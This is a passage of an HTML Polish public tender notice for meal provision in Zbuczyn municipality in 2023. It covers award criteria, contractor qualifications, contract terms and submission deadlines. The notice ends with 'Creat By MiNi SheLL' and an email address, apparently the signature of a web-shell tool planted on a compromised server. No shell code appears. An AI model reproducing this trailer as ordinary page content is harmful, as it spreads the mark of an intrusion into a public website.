zgodnie z tymi przepisami. Wykonawca, składając ofertę, ma obowiązek <br/>poinformować Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego <br/>obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub <br/>świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość dowoązenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia wymagań w tym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca oświadczy, że posiada aktualny wpis do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej na prowadzenie działalności w zakresie przygotowywania i wydawania posiłków w ramach cateringu; transportu artykułów spożywczych niewymagających chłodzenia oraz przewozu posiłków w termosach w ramach cateringu samochodem. <br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten <br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są wymagane. <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia wymagań w tym zakresie. <br/>4)	zdolności technicznej lub zawodowej: <br/>Rozpatrywane będą oferty, w których Wykonawca oświadczy o dysponowaniu odpowiednim <br/>potencjałem technicznym przez który zamawiający rozumie dysponowanie punktem w którym przygotowywane będą posiłki w odległości gwarantującej dowiezienie posiłku o odpowiedniej temperaturze. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z SWZ wraz z załącznikami <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Nazwa zamówienia: Dożywianie dzieci i osób dorosłych na terenie gminy Zbuczyn w 2023 r. Wartość zamówienia nie przekracza progów unijnych określonych na podstawie art. 3 ustawy z 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2022 poz. 1710 ze zm.).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com